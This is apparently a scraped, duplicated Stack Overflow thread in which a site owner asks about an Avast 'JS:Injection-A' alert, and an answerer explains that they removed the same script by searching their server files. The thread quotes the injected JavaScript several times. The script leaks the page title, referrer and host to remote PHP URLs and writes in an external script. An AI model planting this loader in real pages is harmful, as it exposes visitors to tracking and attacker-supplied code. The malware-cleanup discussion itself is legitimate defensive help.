admin管理员组

文章数量:1026989

Today I got a warning from Avast when I wanted to enter to my website: forumhan.

To understand this you must have Avast on your puter.

My website was infected with JS:Injection-A[Trj] — that's why it wasn't showing.

And when I look, I found this on my header:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = ".min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

As I am not a professional, I cannot understand if there is any relation with other files.

Is there any call to other files in this code?

Does removing this solve the problem or not?

I removed it, but I cannot see my webpage.

Today I got a warning from Avast when I wanted to enter to my website: forumhan..

To understand this you must have Avast on your puter.

My website was infected with JS:Injection-A[Trj] — that's why it wasn't showing.

And when I look, I found this on my header:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://vkza.tora.ru/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

As I am not a professional, I cannot understand if there is any relation with other files.

Is there any call to other files in this code?

Does removing this solve the problem or not?

I removed it, but I cannot see my webpage.

Share Improve this question edited Feb 27, 2017 at 19:40 Jonathan Leffler 756k145 gold badges951 silver badges1.3k bronze badges asked Dec 9, 2015 at 10:52 lospicoslospicos 3011 gold badge5 silver badges16 bronze badges
Add a ment  | 

1 Answer 1

Reset to default 2

I've found the solution.

The problem is what you are saying. Someone injected that code to your website (and mine also). So what I've done is pick this snippet:

encodeURIComponent(document.title)

and search in htdocs folder in all the files with Notepad++ on the server.

Then I've found something like this:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://delicefilm./js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

in here:

And I have erased it from all the files. And that's all!

Hope it works for you too! :)

Today I got a warning from Avast when I wanted to enter to my website: forumhan.

To understand this you must have Avast on your puter.

My website was infected with JS:Injection-A[Trj] — that's why it wasn't showing.

And when I look, I found this on my header:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = ".min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

As I am not a professional, I cannot understand if there is any relation with other files.

Is there any call to other files in this code?

Does removing this solve the problem or not?

I removed it, but I cannot see my webpage.

Today I got a warning from Avast when I wanted to enter to my website: forumhan..

To understand this you must have Avast on your puter.

My website was infected with JS:Injection-A[Trj] — that's why it wasn't showing.

And when I look, I found this on my header:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://vkza.tora.ru/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

As I am not a professional, I cannot understand if there is any relation with other files.

Is there any call to other files in this code?

Does removing this solve the problem or not?

I removed it, but I cannot see my webpage.

Share Improve this question edited Feb 27, 2017 at 19:40 Jonathan Leffler 756k145 gold badges951 silver badges1.3k bronze badges asked Dec 9, 2015 at 10:52 lospicoslospicos 3011 gold badge5 silver badges16 bronze badges
Add a ment  | 

1 Answer 1

Reset to default 2

I've found the solution.

The problem is what you are saying. Someone injected that code to your website (and mine also). So what I've done is pick this snippet:

encodeURIComponent(document.title)

and search in htdocs folder in all the files with Notepad++ on the server.

Then I've found something like this:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://delicefilm./js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

in here:

And I have erased it from all the files. And that's all!

Hope it works for you too! :)

本文标签: javascriptAvast gives error of JSInjectionATrj on my websiteStack Overflow